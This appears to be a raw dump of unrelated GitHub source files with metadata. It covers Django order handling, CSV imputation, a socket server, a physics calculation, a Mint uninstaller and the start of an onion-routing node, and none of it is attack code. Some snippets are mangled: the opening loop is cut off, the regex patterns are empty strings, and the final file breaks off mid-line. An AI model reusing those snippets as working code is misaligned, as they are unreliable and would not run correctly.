Ax+Bsin(x)=C/Ax+Bsin(x)=C.py","file_name":"Ax+Bsin(x)=C.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42203508040","text":"import sys\n# input = sys.stdin.buffer.readline\ndef I(): return(list(map(int,input().split())))\ndef sieve(n):\n\ta=[1]*n\n\tfor i in range(2,n):\n\t if a[i]:\n\t for j in range(i*i,n,i):\n\t a[j]=0\n\treturn a\n\nfor __ in range(int(input())):\n\tarr=input()\n\tn=len(arr)\n\tposs=[]\n\ti=0\n\twhile(in-1:break\n\t\tnex=arr[i]\n\t\tif prev!=nex:\n\t\t\tans=min(ans,c+2)\n\tprint(ans) if ans tp.Any:\n \"\"\"\n execs a definition in a file and returns the definiton\n\n For explanation of serialized_tree see\n https://github.com/leonardt/ast_tools/issues/46\n \"\"\"\n tree_name = _get_name(tree)\n if file_name is None:\n file_name = f'{tree_name}_{datetime.datetime.now().isoformat()}.py'\n\n return exec_in_file(tree, st, path, file_name, serialized_tree)[tree_name]\n\ndef _get_name(tree: DefStmt) -> str:\n if isinstance(tree, ast.AST):\n return tree.name\n else:\n return tree.name.value\n\ndef to_source(\n tree: DefStmt\n ) -> str:\n if isinstance(tree, ast.AST):\n return astor.to_source(tree)\n else:\n return to_module(tree).code\n\ndef exec_in_file(\n tree: DefStmt,\n st: SymbolTable,\n path: tp.Optional[str] = None,\n file_name: tp.Optional[str] = None,\n serialized_tree: tp.Optional[DefStmt] = None,\n ) -> tp.MutableMapping[str, tp.Any]:\n\n \"\"\"\n execs an ast as a module and returns the modified enviroment\n\n For explanation of serialized_tree see\n https://github.com/leonardt/ast_tools/issues/46\n \"\"\"\n\n source = to_source(tree)\n if serialized_tree is None:\n serialized_source = source\n else:\n serialized_source = to_source(serialized_tree)\n return exec_str_in_file(source, st, path, file_name, serialized_source)\n\n\ndef exec_str_in_file(\n source: str,\n st: SymbolTable,\n path: tp.Optional[str] = None,\n file_name: tp.Optional[str] = None,\n serialized_source: tp.Optional[str] = None,\n ) -> tp.MutableMapping[str, tp.Any]:\n \"\"\"\n execs a string as a module and returns the modified enviroment\n\n For explanation of serialized_source see\n https://github.com/leonardt/ast_tools/issues/46\n \"\"\"\n\n if path is None:\n path = '.ast_tools'\n\n if file_name is None:\n file_name = f'ast_tools_exec_{datetime.datetime.now().isoformat()}.py'\n\n if serialized_source is None:\n serialized_source = source\n\n file_name = os.path.join(path, file_name)\n os.makedirs(path, exist_ok=True)\n with open(file_name, 'w') as fp:\n fp.write(serialized_source)\n\n try:\n code = compile(source, filename=file_name, mode='exec')\n except Exception as e:\n logging.exception(\"Error compiling source\")\n raise e from None\n\n st_dict = dict(st)\n try:\n exec(code, st_dict)\n return st_dict\n except Exception as e:\n logging.exception(\"Error executing code\")\n raise e from None\n\n\n_AST_CACHE: tp.MutableMapping[tp.Any, ast.AST] = weakref.WeakKeyDictionary()\ndef get_ast(obj) -> ast.AST:\n \"\"\"\n Given an object, get the corresponding AST\n \"\"\"\n try:\n return _AST_CACHE[obj]\n except KeyError:\n pass\n\n src = textwrap.dedent(inspect.getsource(obj))\n\n if isinstance(obj, types.ModuleType):\n tree = ast.parse(src)\n else:\n tree = ast.parse(src).body[0]\n\n return _AST_CACHE.setdefault(obj, tree)\n\n\n\n_CST_CACHE: tp.MutableMapping[tp.Any, cst.CSTNode] = weakref.WeakKeyDictionary()\ndef get_cst(obj) -> cst.CSTNode:\n \"\"\"\n Given an object, get the corresponding CST\n \"\"\"\n try:\n return _CST_CACHE[obj]\n except KeyError:\n pass\n\n src = textwrap.dedent(inspect.getsource(obj))\n\n if isinstance(obj, types.ModuleType):\n tree = cst.parse_module(src)\n else:\n tree = cst.parse_statement(src)\n\n return _CST_CACHE.setdefault(obj, tree)\n\n\ndef is_free_name(tree: cst.CSTNode, env: SymbolTable, name: str):\n names = used_names(tree)\n return name not in names and name not in env\n\n\ndef is_free_prefix(tree: cst.CSTNode, env: SymbolTable, prefix: str):\n names = used_names(tree)\n return not any(\n name.startswith(prefix)\n for name in itertools.chain(names, env.keys()))\n\n\ndef gen_free_name(\n tree: cst.CSTNode,\n env: SymbolTable,\n prefix: tp.Optional[str] = None) -> str:\n names = used_names(tree) | env.keys()\n if prefix is not None and prefix not in names:\n return prefix\n elif prefix is None:\n prefix = '_auto_name_'\n\n f_str = prefix+'{}'\n c = 0\n name = f_str.format(c)\n while name in names:\n c += 1\n name = f_str.format(c)\n\n return name\n\n\ndef gen_free_prefix(\n tree: cst.CSTNode,\n env: SymbolTable,\n preprefix: tp.Optional[str] = None) -> str:\n def check_prefix(prefix: str, used_names: tp.AbstractSet[str]) -> bool:\n return not any(name.startswith(prefix) for name in used_names)\n\n names = used_names(tree) | env.keys()\n\n if preprefix is not None and check_prefix(preprefix, names):\n return preprefix\n elif preprefix is None:\n preprefix = '_auto_prefix_'\n\n f_str = preprefix+'{}'\n c = 0\n prefix = f_str.format(c)\n while not check_prefix(prefix, names):\n c += 1\n prefix = f_str.format(c)\n\n return prefix\n","repo_name":"leonardt/ast_tools","sub_path":"ast_tools/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5873,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"41300060777","text":"from django.db import models\nfrom django.db.models.signals import post_save\nfrom simple_history.models import HistoricalRecords\nfrom patolsima_api.utils.models import AuditableMixin, ArchivableMixing\nfrom patolsima_api.apps.core.models.estudio import Estudio\n\n\nclass Muestra(AuditableMixin, ArchivableMixing):\n class Estados(models.TextChoices):\n RECIBIDA = \"RECIBIDA\"\n DESCRIPCION_MACROSCOPICA = \"DESCRIPCION_MACROSCOPICA\"\n DESHIDRATACION = \"DESHIDRATACION\"\n INCLUSION_EN_PARAFINA = \"INCLUSION_EN_PARAFINA\"\n CORTE_MICROTOMO = \"CORTE_MICROTOMO\"\n COLORACION = \"COLORACION\"\n COLORACIONES_ESPECIALES = \"COLORACIONES_ESPECIALES\"\n DIAGNOSTICO_MICROSCOPICO = \"DIAGNOSTICO_MICROSCOPICO\"\n ALMACENAMIENTO = \"ALMACENAMIENTO\"\n DISPOSICION_DE_RESIDUOS = \"DISPOSICION_DE_RESIDUOS\"\n PERDIDA = \"PERDIDA\"\n\n estudio = models.ForeignKey(\n Estudio, on_delete=models.CASCADE, related_name=\"muestras\"\n )\n tipo_de_muestra = models.CharField(max_length=255)\n descripcion = models.CharField(max_length=512, null=True, blank=True)\n notas = models.TextField(null=True, blank=True)\n estado = models.CharField(\n max_length=32, choices=Estados.choices, default=Estados.RECIBIDA, db_index=True\n )\n\n history = HistoricalRecords()\n\n @classmethod\n def post_create(cls, sender, instance, created, *args, **kwargs):\n if not created:\n return\n\n instance.fases.create(muestra=instance, notas=\"\")\n\n\npost_save.connect(Muestra.post_create, Muestra)\n","repo_name":"jiro141/patolsima-free-api","sub_path":"patolsima_api/apps/core/models/muestra.py","file_name":"muestra.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72930037926","text":"import requests, re\n\n# Parse out the text block\nlink = 'http://www.pythonchallenge.com/pc/def/ocr.html'\nbody = requests.get(link)\n\npattern = re.compile('')\nmatch = pattern.search(body.text)\n\ndata = match.group()\ndata = re.sub('','',data)\n\nfrequency = {}\nfor letter in data:\n if letter in frequency:\n frequency[letter] = frequency[letter] + 1\n else:\n frequency[letter] = 1\n\nrare = \"\"\nfor key in frequency:\n if frequency[key] == 1:\n rare += key\n\nprint(rare)","repo_name":"oestej/python_challenge","sub_path":"02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28284729901","text":"def get_float_from_user(msg):\r\n try:\r\n user_in=float(input(msg))\r\n\r\n except ValueError as e:\r\n print(\"You did not enter a number!\" )\r\n except KeyboardInterrupt:\r\n print(\"\\n***Oops, something went wrong! Try again!\\n\")\r\n else:\r\n # print(user_in)\r\n return user_in\r\n\r\ndef user_data():\r\n user_number = get_float_from_user(\"***Enter a number, please! \")\r\n user_height = get_float_from_user(\"I need to know your height in centimetres: \")\r\n user_weight = get_float_from_user(\"And your weight in kilograms: \") \r\n \r\n try:\r\n print(\"Your height is: {:5.2f}cm. and you weight {:.2f}kg.\".format(user_height, user_weight)) \r\n except:\r\n print(\"\\n***Oops, something went wrong! Try again!\\n\")\r\n\r\nuser_data()","repo_name":"NLazarova15/MyCode","sub_path":"get_float_from_user.py","file_name":"get_float_from_user.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16762176854","text":"\nimport numpy as np\ncount=0\nlist1=[i for i in range(1,10)]\nmatrix2=[]\nmatrix=[\n [ 1, 2, 3 ],\n [ 4, 5, 6 ],\n [ 7, 8, 9 ]\n]\nmatrix2=np.array(list1).reshape(3,3)\nprint(matrix2)\nfor i in range(len(matrix[0])):\n count+=1\nm,n=len(matrix)-1,count-1\nlast_row=m\nlast_col=n\nlist2=[]\nk=0\nl=0\nmatrix4=[]\nwhile (k<=last_row and l<=last_col):\n for i in range(last_col+1):\n list2.append(matrix[k][i])\n k+=1\n for i in range(k,last_row+1):\n list2.append(matrix[i][last_col])\n last_col-=1\n for i in range(last_col,l-1,-1):\n list2.append(matrix[last_row][i])\n last_row-=1\n for i in range(last_row,k-1,-1):\n list2.append(matrix[i][l])\n l+=1\nprint(list2)\nmatrix4=np.array(list2).reshape(3,3)\nprint(matrix4)","repo_name":"jagdishwar/CP","sub_path":"spiralmatric2.py","file_name":"spiralmatric2.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30398109564","text":"from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render,redirect\nfrom django.contrib.auth.decorators import login_required\nfrom . models import Order,OrderItem\nfrom carts.models import Cart\nfrom products.models import ProductItem\nfrom django.contrib import messages\nfrom accounts.models import Profile\nfrom . constants import PAYMENT_TYPE_RAZORPAY\nfrom .forms import AddressForm\nfrom django.db import transaction\n\nfrom products.models import Coupon_code\n#celery\nfrom .task import send_email_task\nimport random\n\n# Create your views here.\n\n#transaction.atomic !Done!\n@login_required(login_url='logIn')\ndef place_order(request):\n \"\"\"\n takes a request of COD or razorpay and does the validation\n and of address field if uses old address it gets it and do \n the payment integration and saves to the Order and OrderItem models\n\n \"\"\"\n if request.method == 'POST':\n\n address_form = AddressForm(request.POST)\n\n if address_form.is_valid():\n\n # Start a database transaction block\n with transaction.atomic():\n neworder = Order()\n neworder.user = request.user\n neworder.payment_mode = request.POST.get('payment_mode')\n neworder.payment_id = request.POST.get('payment_id')\n\n #FORM VALIDATION done !Done!\n # Check if a Profile for the user exists, and create/update it\n address, created = Profile.objects.get_or_create(user=request.user, status=True)\n\n\n address.fname = address_form.cleaned_data['fname']\n address.lname = address_form.cleaned_data['lname']\n address.phone = address_form.cleaned_data['phone']\n address.email = address_form.cleaned_data['email']\n address.country = address_form.cleaned_data['country']\n address.address = address_form.cleaned_data['address']\n address.city = address_form.cleaned_data['city']\n address.state = address_form.cleaned_data['state']\n address.pincode = address_form.cleaned_data['pincode']\n address.save()\n\n #set the applied coupon code in the order\n applied_coupon_code = request.session.get('applied_coupon', None)\n # print(f\"Applied Coupon Code: {applied_coupon_code}\")\n if applied_coupon_code:\n try:\n coupon = Coupon_code.objects.get(code=applied_coupon_code, active=True)\n # print(f\"Coupon Status: {coupon.active}\")\n neworder.applied_coupon = coupon\n # print(\"Coupon Applied to Order\")\n except Coupon_code.DoesNotExist:\n neworder.applied_coupon = None\n # print(\"Coupon Not Found\")\n\n neworder.address = address\n\n\n \n # # TODO : remove for loop move to DB !Done!\n\n\n\n tracking_number = genearate_tracking_number(request.user)\n neworder.tracking_no = tracking_number\n neworder.save()\n\n neworderitems = Cart.objects.filter(user=request.user)\n\n # Create a list of OrderItem objects to be created in bulk\n order_items = []\n\n for item in neworderitems:\n #preparing data for OrderItem creation\n\n order_item_data = {\n 'order': neworder,\n 'product': item.product,\n 'price': item.product.price,\n 'quantity': item.qty,\n # TODO: remove total amount !Done!\n }\n\n # Append the data to the list\n order_items.append(OrderItem(**order_item_data))\n\n #decreasing product quantity from available stock\n # TODO: locking mechanism => reduce & bd locker !Done!\n orderproduct = ProductItem.objects.select_for_update().get(id=item.product.id)\n if orderproduct.stock >= item.qty:\n orderproduct.stock -= item.qty\n orderproduct.save()\n else:\n return JsonResponse({'error': 'Not enough stock'})\n \n # Clear the applied_coupon session\n if 'applied_coupon' in request.session:\n del request.session['applied_coupon']\n\n # Clear the list of applied coupons in the session\n request.session['applied_coupons'] = []\n\n\n # Use a database transaction for the bulk create operation\n OrderItem.objects.bulk_create(order_items)\n\n\n #clearing user's cart\n Cart.objects.filter(user=request.user).delete()\n\n\n pay_mode = request.POST.get('payment_mode')\n if (pay_mode == PAYMENT_TYPE_RAZORPAY):\n # TODO: translation languages\n send_email_task.delay(request.user.id, neworder.id)\n print(f\"worked {send_email_task} \")\n return JsonResponse({'status': 'Your Order has been placed successfully'})\n # return redirect(\"payment-confirmation\")\n\n else:\n send_email_task.delay(request.user.id, neworder.id)\n messages.success(request, \"Your Order has been placed successfully\")\n return redirect(\"payment-confirmation\")\n\n \n else:\n return JsonResponse({'error': 'Form validation failed. Return back to checkout Page'})\n\n # return render(request, \"confirmation.html\")\n\n #TODO admin actions on ordered items\n\n\n\n@login_required(login_url='logIn')\ndef razorpay_check(request):\n \"\"\"\n getting total amount of all products to integrate\n razorpay.\n \"\"\"\n cart = Cart.objects.filter(user=request.user)\n\n subtotal = 0\n for item in cart:\n totalprice = item.product.price * item.qty\n subtotal += totalprice\n\n # Check if a coupon is applied\n applied_coupon_code = request.session.get('applied_coupon', None)\n\n if applied_coupon_code:\n # Try to get the coupon or set discounted_price to subtotal\n try:\n coupon = Coupon_code.objects.get(code=applied_coupon_code, active=True)\n # Apply the coupon discount to the subtotal\n subtotal -= subtotal * coupon.discount / 100\n except Coupon_code.DoesNotExist:\n # If the coupon is not found, ignore it\n pass\n\n return JsonResponse({'subtotal': subtotal})\n\ndef genearate_tracking_number(user):\n tracking_number = f\"{user.username}-{random.randint(1111111,9999999)}\"\n return tracking_number\n\n\n\n\ndef payment_confirmation(request):\n \"\"\"retrieving a users latest order details\"\"\"\n\n latest_order = Order.objects.filter(user=request.user).order_by('-created_at').first()\n\n if latest_order:\n order_items = OrderItem.objects.filter(order=latest_order)\n address = Profile.objects.filter(user=request.user, status=True)\n\n context = {\n 'order': latest_order,\n 'order_items': order_items,\n 'address': address,\n }\n return render(request, \"confirmation.html\", context)\n else:\n messages.error(request, \"No order found\")\n return redirect('/')\n\n#digital ocean,AWS\n#gitignore, readme\n\n","repo_name":"dulfackerhisham/StepWise","sub_path":"orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8431190279","text":"\"\"\"URLs for the asyncmailer app.\"\"\"\nfrom compat import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^index$', views.index),\n url(r'^get_variations$', views.get_variations),\n url(r'^get_json$', views.get_json),\n url(r'^retrieve$', views.retrieve),\n url(r'^presend$', views.presend),\n url(r'^send_by_email$', views.send_by_email),\n # append your urls here\n]\n","repo_name":"lc4t/xls-messager","sub_path":"proj/asyncmailer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17023389214","text":"import argparse\n\n#lấy tham số từ cmd\nparser = argparse.ArgumentParser()\nparser.add_argument('filename', help='input CSV file')\nparser.add_argument('--method', choices=['mean', 'median', 'mode'], default='mean', help='imputation method')\nparser.add_argument('--columns', nargs='+',default=\"\", help='columns to impute')\nparser.add_argument('--out', help='output CSV file')\n\nargs = parser.parse_args()\n\nfilename = args.filename\nmethod = args.method\ncolumns_todo = args.columns\noutput = args.out\n\nwith open(filename, 'r') as f:\n data = f.read()\n\n# Phân tích chuỗi CSV và tìm tên cột và dữ liệu\nrows = data.split('\\n')\ncolumn_names = rows[0].split(',')\ndata = [row.split(',') for row in rows[1:] if row]\nif columns_todo == '':\n columns_todo = column_names\n\n#hàm check float\ndef is_float(x):\n try:\n float(x)\n return True\n except ValueError:\n return False\n\n#chuyển các số đang ở kiểu str thành kiểu int, float\nfor row in data:\n for i in range(len(row)):\n if row[i].isdigit(): \n row[i] = int(row[i])\n elif row[i] == '':\n pass\n else:\n try:\n row[i] = float(row[i]) \n except ValueError:\n pass \n\n#check datatype của các column\ndata_types = []\nfor i in range(len(column_names)):\n col_data = [row[i] for row in data if row[i]]\n if all(is_float(x) for x in col_data):\n data_types.append('numeric')\n else:\n data_types.append('categorical')\n\n#tính mean, median, mode\nfor i in range(len(column_names)):\n if column_names[i] in columns_todo:\n col_data = [row[i] for row in data if row[i]]\n if data_types[i] == 'numeric':\n col_data = [float(x) for x in col_data]\n if method == 'mean':\n if len(col_data) > 0:\n col_mean = sum(col_data) / len(col_data)\n for j in range(len(data)):\n if not data[j][i]:\n data[j][i] = col_mean\n else:\n for j in range(len(data)):\n if not data[j][i]:\n data[j][i] = 0\n elif method == 'median':\n if len(col_data) > 0:\n col_median = sorted(col_data)[len(col_data) // 2]\n for j in range(len(data)):\n if not data[j][i]:\n data[j][i] = col_median\n else:\n for j in range(len(data)):\n if not data[j][i]:\n data[j][i] = 0\n \n else:\n col_data = [x for x in col_data if x]\n if len(col_data) > 0:\n col_mode = max(set(col_data), key=col_data.count)\n for j in range(len(data)):\n if not data[j][i]:\n data[j][i] = col_mode\n else:\n for j in range(len(data)):\n if not data[j][i]:\n data[j][i] = ''\n\n\n#xuat file output\ncolumn_index = []\nfor i in range(len(columns_todo)):\n if columns_todo[i] in column_names:\n column_index.append(column_names.index(columns_todo[i]))\nnew_data = []\nfor i in range(len(column_index)):\n temp = []\n for row in data:\n temp.append(row[column_index[i]])\n new_data.append(temp)\n\nwith open(output, 'w') as f:\n \n for i in range(len(columns_todo)):\n \n if i == len(columns_todo) - 1:\n f.write(str(columns_todo[i]) + '\\n')\n else:\n f.write(str(columns_todo[i]) + ',')\n \n for col in range(len(new_data[0])):\n \n col_values = [str(row[col]) for row in new_data]\n f.write(','.join(col_values) + '\\n')","repo_name":"Sury2511/Data-Preprocessing-and-Data-exploration","sub_path":"cau3.py","file_name":"cau3.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7819949562","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar 1 10:33:15 2022\r\n\r\n@author: Dom Dai\r\n\"\"\"\r\n\r\nfrom time import ctime\r\n\r\n#lay thoi gian he thong : ctime\r\n#host : \"127.0.0.1\", port = 9050\r\n#bytes(ctime(),'utf-8')\r\n#server\r\nimport socket\r\nimport sys \r\n\r\nif __name__=='__main__':\r\n try:\r\n sk = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n except socket.error as err:\r\n print(\"Error: %s\"%str(err))\r\n sys.exit()\r\n print(\"Da tao duoc socket\")\r\n host = \"127.0.0.1\"\r\n port = 9050\r\n \r\n sk.bind((host,port))\r\n sk.listen(5)\r\n sk.setsockopt(socket.S0L_SOCKETL_SOCKET, socket.SO_REUSEADDR, 1)\r\n \r\n while True:\r\n print(\"waiting for client\")\r\n client_sk,client_addr = sk.accept()\r\n print(\"Dia chi client: \",client_addr)\r\n data = client_sk.recv(4096)\r\n if not data or data.decode(\"utf-8\")!= 'time':\r\n break;\r\n client_sk.send(bytes(ctime(),'utf-8'))\r\n client_sk.close()\r\n sk.close()","repo_name":"Daiappweb/CodeMang","sub_path":"LTTM/Time_Server.py","file_name":"Time_Server.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26726372635","text":"# Code for obtaining DOS of a N-ZZNT by definition\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import integrate\n\ndef make_NZZNT_hamiltonian(k, N, alpha=1.0, beta=-2.0, a=1.0):\n\n H = np.identity(4*N, dtype=complex) * alpha\n\n # Upper and lower diagonal\n\n for i in range(4*N):\n for j in range(4*N):\n if j == i+1 or j == i-1:\n H[i,j] = beta\n\n # Antidiagonal \n for i in range(0, 2*N, 2):\n H[i, 4*N-1-i] = beta\n if i+1 < 2*N: \n H[i+1, 4*N-2-i] = beta*np.exp(-1j*k*a)\n\n for i in range(4*N-1, 2*N-1, -2):\n H[i, 4*N-1-i] = beta\n if i-1 >= 2*N: \n H[i-1, 4*N-i] = beta*np.exp(1j*k*a)\n\n # NZZNT\n\n H[0, 2*N-1] = H[2*N-1, 0] = beta\n H[2*N, 4*N-1] = H[4*N-1, 2*N] = beta\n \n return H\n\ndef diagonalize(N, hamiltonian_function):\n k_points = 1000\n k_array = np.linspace(-np.pi/a, np.pi/a, k_points)\n E_array = np.zeros((k_points, 4*N))\n \n for idx, k in enumerate(k_array):\n H = hamiltonian_function(k, N, alpha, beta, a)\n E_array[idx] = np.linalg.eigvalsh(H)\n \n return E_array\n\n\ndef get_dos(Ek, E, eta):\n dos = 0.0\n\n for i in range(len(E.flatten())):\n dos += eta / (eta**2 + (Ek - E.flatten()[i])**2)\n \n return dos\n\n# Obtaining energies\n\nalpha = 0.0\nbeta = -2.8\na = 1.42\n\nk_array = np.linspace(-np.pi/a, np.pi/a, 1000)\n\nE_Z9 = diagonalize(N=9, hamiltonian_function=make_NZZNT_hamiltonian)\nE_Z10 = diagonalize(N=10, hamiltonian_function=make_NZZNT_hamiltonian)\nE_Z11 = diagonalize(N=11, hamiltonian_function=make_NZZNT_hamiltonian)\n\n# Getting DOS\n\neta = 1e-2\nEk = np.linspace(-9.0, 9.0, 1000)\n\ndos_z9 = get_dos(Ek, E_Z9, eta)\ndos_z10 = get_dos(Ek, E_Z10, eta)\ndos_z11 = get_dos(Ek, E_Z11, eta)\n\n# Normalization\n\nA9 = integrate.simps(dos_z9, Ek)\nA10 = integrate.simps(dos_z10, Ek)\nA11 = integrate.simps(dos_z11, Ek)\n\n# Plotting\n\nplt.figure(figsize=(15,5))\n\nplt.subplot(1,3,1)\nplt.plot(Ek, dos_z9/A9, c='k')\nplt.xlabel('E')\nplt.ylabel('DOS')\nplt.grid(ls=':')\nplt.ylim(0, 0.3)\nplt.title(f'N-ZZNT, N = 9')\n\nplt.subplot(1,3,2)\nplt.plot(Ek, dos_z10/A10, c='k')\nplt.xlabel('E')\nplt.ylabel('DOS')\nplt.grid(ls=':')\nplt.ylim(0, 0.3)\nplt.title(f'N-ZZNT, N = 10', c='k')\n\nplt.subplot(1,3,3)\nplt.plot(Ek, dos_z11/A11, c='k')\nplt.xlabel('E')\nplt.ylabel('DOS')\nplt.grid(ls=':')\nplt.ylim(0, 0.3)\nplt.title(f'N-ZZNT, N = 11')\n\nplt.show()\n","repo_name":"franklinzppa/electronic-structure","sub_path":"nanotubes/scripts/nzznt-definition-dos.py","file_name":"nzznt-definition-dos.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17996187461","text":"#!/usr/bin/python3\n\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nimport sys\nimport os\nimport gettext\nimport subprocess\n\nfrom pathlib import Path\nfrom mintcommon.installer import installer\n\n# i18n\ngettext.install(\"mintinstall\", \"/usr/share/linuxmint/locale\")\n\nclass AppUninstaller:\n def __init__(self, desktopFile):\n self.desktopFile = desktopFile\n\n self.installer = installer.Installer().init(self.on_installer_ready)\n\n def on_installer_ready(self):\n pkg_name = None\n\n pkg_name = self.get_apt_name()\n\n if pkg_name is None:\n pkg_name = self.get_fp_name()\n\n if pkg_name is None:\n print(\"Package for '%s' not found\" % self.desktopFile)\n self.on_finished(None, 1)\n\n pkginfo = self.installer.find_pkginfo(pkg_name)\n\n if pkginfo and self.installer.pkginfo_is_installed(pkginfo):\n self.installer.select_pkginfo(pkginfo, self.on_installer_ready_to_remove)\n else:\n print(\"Package '%s' is not installed\" % pkginfo.name)\n self.on_finished(None, 1)\n\n def on_installer_ready_to_remove(self, task):\n self.installer.execute_task(task, self.on_finished)\n\n def get_apt_name(self):\n (status, output) = subprocess.getstatusoutput(\"dpkg -S \" + self.desktopFile)\n package = output[:output.find(\":\")].split(\",\")[0]\n\n if status == 0:\n return package\n else:\n return None\n\n def get_fp_name(self):\n path = Path(self.desktopFile)\n\n if \"flatpak\" not in path.parts:\n return None\n\n return path.stem\n\n def on_finished(self, pkginfo=None, error=None):\n Gtk.main_quit()\n\n if error:\n sys.exit(1)\n else:\n sys.exit(0)\n\nif __name__ == \"__main__\":\n\n # Exit if the given path does not exist\n if len(sys.argv) < 2 or not os.path.exists(sys.argv[1]) or not sys.argv[1].endswith(\".desktop\"):\n print(\"mintinstall-remove-app: Single argument required, the full path of a desktop file.\")\n sys.exit(1)\n\n mainwin = AppUninstaller(sys.argv[1])\n Gtk.main()\n","repo_name":"PikaOS-Linux/pkgs-baseos","sub_path":"mintinstall/mintinstall/usr/lib/linuxmint/mintinstall/mintinstall-remove-app.py","file_name":"mintinstall-remove-app.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"2231092584","text":"#!/usr/bin/env python3\n# coding : utf-8\n\nimport socket, pickle\nimport argparse\nimport configparser\nfrom class_cell import RelayCell, ExtendCell, CreateCell, DestroyCell \nfrom os import chmod, path\nfrom typing import List, Dict\nfrom aes_rsa import *\nfrom _thread import *\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey\nfrom cryptography.hazmat.primitives.kdf.hkdf import HKDF\nfrom cryptography.hazmat.primitives.asymmetric import x25519\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.backends import default_backend\n\n# Init\n# ----------------------------------------------------------------\n\nCONFIG_FILE: str = \"spicy_onions.cfg\"\nIP: str = socket.gethostbyname(socket.gethostname())\n\n# Read configuration\nconfig = configparser.ConfigParser()\nconfig.read(CONFIG_FILE)\n\n# Set configuration variables\nDIR_PORT: int = int(config['DIRECTORY']['Port'])\nONION_ROUTER: str = config[\"MESSAGES\"][\"OnionRouter\"]\nSEP: str = config[\"MESSAGES\"][\"Separator\"]\nENTRANCE: str = config[\"MESSAGES\"][\"Entrance\"]\n# The keypair filenames to search for/to write to\npriv_key_file: str = config['NODE']['PrivateKeyFilename']\npub_key_file: str = config['NODE']['PublicKeyFilename']\n# The port on which we will listen\nPORT: int = int(config['DEFAULT']['Port'])\nBUFFER_SIZE: int = int(config['DEFAULT']['BufferSize'])\n\n# Known nodes\nnode_list = {}\n\n# Parse command line arguments\nparser = argparse.ArgumentParser(\n description=\"The program will detect and use already existing key if no option is specified\")\nparser.add_argument(\"-g\", \"--generate-keys\", action=\"store_true\", help=\"Generate RSA keypair of node\")\nargs = parser.parse_args()\n\n# Get node's keypair\n# ----------------------------------------------------------------\n# Check if key generation is needed\nif args.generate_keys:\n print(\"Generating RSA key pair.\")\n pub_key, priv_key = gen_rsa_key()\n\n with open(priv_key_file, 'wb') as f:\n chmod(priv_key_file, 0o600)\n f.write(priv_key)\n\n with open(pub_key_file, 'wb') as f:\n chmod(pub_key_file, 0o600)\n f.write(pub_key)\n\nelif path.exists(pub_key_file) and path.exists(priv_key_file):\n print(\"Importing RSA key pair.\")\n\n try:\n with open(pub_key_file, 'rb') as f:\n pub_key = f.read()\n with open(priv_key_file, 'rb') as f:\n priv_key = f.read()\n except:\n print(\"Importing keys failed\")\n exit()\nelse:\n parser.print_help()\n exit()\n\n# Send public key to directory\n# ----------------------------------------------------------------\nDIR_IP: str = input(\"Directory server to connect to: \")\nprint(\"Sending request to directory server.\")\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((DIR_IP, DIR_PORT))\ns.send(bytes(ONION_ROUTER + SEP, \"utf-8\") + pub_key)\ns.close()\n\n# Listen in order to get data from directory\n# ----------------------------------------------------------------\nprint(\"Listen for public keys on {}:{}\".format(IP, DIR_PORT))\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((IP, DIR_PORT))\ns.listen(1)\n\nconn, addr = s.accept()\nsep_as_bytes: bytes = SEP.encode(\"UTF-8\")\ndata: List[bytes] = conn.recv(BUFFER_SIZE).split(sep_as_bytes)\nnumber_of_nodes: int = int(data[0])\ndata: List[bytes] = data[1:]\n\nprint(\"Data received from directory :\")\nfor x in range(number_of_nodes):\n node_list[data[2 * x]] = data[2 * x + 1]\n print(\"Public key of \" + data[2 * x].decode())\n\nconn.close()\ns.close()\n\n\n#Start Relay Servers\n# ----------------------------------------------------------------\n\nrs = socket.socket()\nThreadCount = 0\n\ntry:\n rs.bind((IP, PORT))\nexcept socket.error as e:\n print(str(e))\n\n# Key Creation\n# ----------------------------------------------------------------\n\nprivate_onion_key = X25519PrivateKey.generate()\npublic_onion_key = private_onion_key.public_key()\npublic_bytes = public_onion_key.public_bytes(\n encoding=serialization.Encoding.Raw,\n 